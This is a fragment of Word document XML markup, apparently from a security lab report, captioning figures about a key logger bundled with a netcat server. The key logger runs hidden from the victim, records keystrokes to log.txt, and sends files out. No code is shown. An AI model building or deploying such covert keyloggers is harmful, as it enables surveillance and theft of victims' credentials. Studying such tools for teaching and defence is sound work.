+              <v:shape w14:anchorId="1B32CA27" id="_x0000_s1033" type="#_x0000_t202" style="width:468pt;height:271.95pt;visibility:visible;mso-wrap-style:none;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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" strokecolor="white [3212]">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:noProof/>
+                        </w:rPr>
+                        <w:drawing>
+                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C044308" wp14:editId="1F23A8C8">
+                            <wp:extent cx="5937885" cy="3122295"/>
+                            <wp:effectExtent l="0" t="0" r="5715" b="1905"/>
+                            <wp:docPr id="49" name="Picture 49"/>
+                            <wp:cNvGraphicFramePr>
+                              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                            </wp:cNvGraphicFramePr>
+                            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                  <pic:nvPicPr>
+                                    <pic:cNvPr id="0" name="Picture 9"/>
+                                    <pic:cNvPicPr>
+                                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                    </pic:cNvPicPr>
+                                  </pic:nvPicPr>
+                                  <pic:blipFill>
+                                    <a:blip r:embed="rId15">
+                                      <a:extLst>
+                                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                        </a:ext>
+                                      </a:extLst>
+                                    </a:blip>
+                                    <a:srcRect/>
+                                    <a:stretch>
+                                      <a:fillRect/>
+                                    </a:stretch>
+                                  </pic:blipFill>
+                                  <pic:spPr bwMode="auto">
+                                    <a:xfrm>
+                                      <a:off x="0" y="0"/>
+                                      <a:ext cx="5937885" cy="3122295"/>
+                                    </a:xfrm>
+                                    <a:prstGeom prst="rect">
+                                      <a:avLst/>
+                                    </a:prstGeom>
+                                    <a:noFill/>
+                                    <a:ln>
+                                      <a:noFill/>
+                                    </a:ln>
+                                  </pic:spPr>
+                                </pic:pic>
+                              </a:graphicData>
+                            </a:graphic>
+                          </wp:inline>
+                        </w:drawing>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">Figure </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>7</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">. </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>The key logger</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:anchorlock/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figure 7 shows the data obtained by the key logger application packaged with the netcat server. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This application will be hidden from the victim during its execution. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The key logger communicates with the kernel of the Windows operating system through methods exposed by the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>win32</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dynamic link library. This said library handles memory management, input and output operations as well as interrupts. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The key logger creates a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">log.txt </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">file that contains the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>cleaned-up</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> data obtained from the key logger. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Although, keys like </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">up, down, control </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>and alike a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>ppear the same in the log file.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A492438" wp14:editId="3E90CB40">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:posOffset>148528</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>11105</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="5943600" cy="3389506"/>
+                <wp:effectExtent l="0" t="0" r="10160" b="20955"/>
+                <wp:wrapNone/>
+                <wp:docPr id="28" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5943600" cy="3389506"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:schemeClr val="bg1"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:noProof/>
+                              </w:rPr>
+                              <w:drawing>
+                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57904892" wp14:editId="22BF6299">
+                                  <wp:extent cx="5798634" cy="3033837"/>
+                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                                  <wp:docPr id="57" name="Picture 57"/>
+                                  <wp:cNvGraphicFramePr>
+                                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                                  </wp:cNvGraphicFramePr>
+                                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                        <pic:nvPicPr>
+                                          <pic:cNvPr id="0" name="Picture 16"/>
+                                          <pic:cNvPicPr>
+                                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                          </pic:cNvPicPr>
+                                        </pic:nvPicPr>
+                                        <pic:blipFill>
+                                          <a:blip r:embed="rId16">
+                                            <a:extLst>
+                                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                              </a:ext>
+                                            </a:extLst>
+                                          </a:blip>
+                                          <a:srcRect/>
+                                          <a:stretch>
+                                            <a:fillRect/>
+                                          </a:stretch>
+                                        </pic:blipFill>
+                                        <pic:spPr bwMode="auto">
+                                          <a:xfrm>
+                                            <a:off x="0" y="0"/>
+                                            <a:ext cx="5801920" cy="3035556"/>
+                                          </a:xfrm>
+                                          <a:prstGeom prst="rect">
+                                            <a:avLst/>
+                                          </a:prstGeom>
+                                          <a:noFill/>
+                                          <a:ln>
+                                            <a:noFill/>
+                                          </a:ln>
+                                        </pic:spPr>
+                                      </pic:pic>
+                                    </a:graphicData>
+                                  </a:graphic>
+                                </wp:inline>
+                              </w:drawing>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">Figure </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>7.1</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>Example key logger data</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="6A492438" id="_x0000_s1034" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:11.7pt;margin-top:.85pt;width:468pt;height:266.9pt;z-index:-251646976;visibility:visible;mso-wrap-style:none;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-height-percent:0;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" strokecolor="white [3212]">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:noProof/>
+                        </w:rPr>
+                        <w:drawing>
+                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57904892" wp14:editId="22BF6299">
+                            <wp:extent cx="5798634" cy="3033837"/>
+                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                            <wp:docPr id="57" name="Picture 57"/>
+                            <wp:cNvGraphicFramePr>
+                              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                            </wp:cNvGraphicFramePr>
+                            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                  <pic:nvPicPr>
+                                    <pic:cNvPr id="0" name="Picture 16"/>
+                                    <pic:cNvPicPr>
+                                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                    </pic:cNvPicPr>
+                                  </pic:nvPicPr>
+                                  <pic:blipFill>
+                                    <a:blip r:embed="rId16">
+                                      <a:extLst>
+                                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                        </a:ext>
+                                      </a:extLst>
+                                    </a:blip>
+                                    <a:srcRect/>
+                                    <a:stretch>
+                                      <a:fillRect/>
+                                    </a:stretch>
+                                  </pic:blipFill>
+                                  <pic:spPr bwMode="auto">
+                                    <a:xfrm>
+                                      <a:off x="0" y="0"/>
+                                      <a:ext cx="5801920" cy="3035556"/>
+                                    </a:xfrm>
+                                    <a:prstGeom prst="rect">
+                                      <a:avLst/>
+                                    </a:prstGeom>
+                                    <a:noFill/>
+                                    <a:ln>
+                                      <a:noFill/>
+                                    </a:ln>
+                                  </pic:spPr>
+                                </pic:pic>
+                              </a:graphicData>
+                            </a:graphic>
+                          </wp:inline>
+                        </w:drawing>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">Figure </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>7.1</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>Example key logger data</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Figure 7.1 shows example data obtained from the victim’s keyboard st</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">rokes. This file is updated for every key that the victim presses. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36019E94" wp14:editId="7FD583E5">
+                <wp:extent cx="5943600" cy="3473355"/>
+                <wp:effectExtent l="0" t="0" r="10160" b="13335"/>
+                <wp:docPr id="59" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5943600" cy="3473355"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:schemeClr val="bg1"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:noProof/>
+                              </w:rPr>
+                              <w:drawing>
+                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17AA627B" wp14:editId="5DAC5607">
+                                  <wp:extent cx="5936615" cy="3118485"/>
+                                  <wp:effectExtent l="0" t="0" r="6985" b="5715"/>
+                                  <wp:docPr id="61" name="Picture 61"/>
+                                  <wp:cNvGraphicFramePr>
+                                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                                  </wp:cNvGraphicFramePr>
+                                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                        <pic:nvPicPr>
+                                          <pic:cNvPr id="0" name="Picture 17"/>
+                                          <pic:cNvPicPr>
+                                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                          </pic:cNvPicPr>
+                                        </pic:nvPicPr>
+                                        <pic:blipFill>
+                                          <a:blip r:embed="rId17">
+                                            <a:extLst>
+                                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                              </a:ext>
+                                            </a:extLst>
+                                          </a:blip>
+                                          <a:srcRect/>
+                                          <a:stretch>
+                                            <a:fillRect/>
+                                          </a:stretch>
+                                        </pic:blipFill>
+                                        <pic:spPr bwMode="auto">
+                                          <a:xfrm>
+                                            <a:off x="0" y="0"/>
+                                            <a:ext cx="5936615" cy="3118485"/>
+                                          </a:xfrm>
+                                          <a:prstGeom prst="rect">
+                                            <a:avLst/>
+                                          </a:prstGeom>
+                                          <a:noFill/>
+                                          <a:ln>
+                                            <a:noFill/>
+                                          </a:ln>
+                                        </pic:spPr>
+                                      </pic:pic>
+                                    </a:graphicData>
+                                  </a:graphic>
+                                </wp:inline>
+                              </w:drawing>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">Figure </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>8</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">. </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>Sending files</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+              </wp:inline>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="36019E94" id="_x0000_s1035" type="#_x0000_t202" style="width:468pt;height:273.5pt;visibility:visible;mso-wrap-style:none;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:top" o:gfxdata="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" strokecolor="white [3212]">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:noProof/>
+                        </w:rPr>
+                        <w:drawing>
+                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17AA627B" wp14:editId="5DAC5607">
+                            <wp:extent cx="5936615" cy="3118485"/>
+                            <wp:effectExtent l="0" t="0" r="6985" b="5715"/>
+                            <wp:docPr id="61" name="Picture 61"/>
+                            <wp:cNvGraphicFramePr>
+                              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                            </wp:cNvGraphicFramePr>
+                            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                  <pic:nvPicPr>
+                                    <pic:cNvPr id="0" name="Picture 17"/>
+                                    <pic:cNvPicPr>
+                                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                    </pic:cNvPicPr>
+                                  </pic:nvPicPr>
+                                  <pic:blipFill>
+                                    <a:blip r:embed="rId17">
+                                      <a:extLst>
+                                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                        </a:ext>
+                                      </a:extLst>
+                                    </a:blip>
+                                    <a:srcRect/>
+                                    <a:stretch>
+                                      <a:fillRect/>
+                                    </a:stretch>
+                                  </pic:blipFill>
+                                  <pic:spPr bwMode="auto">
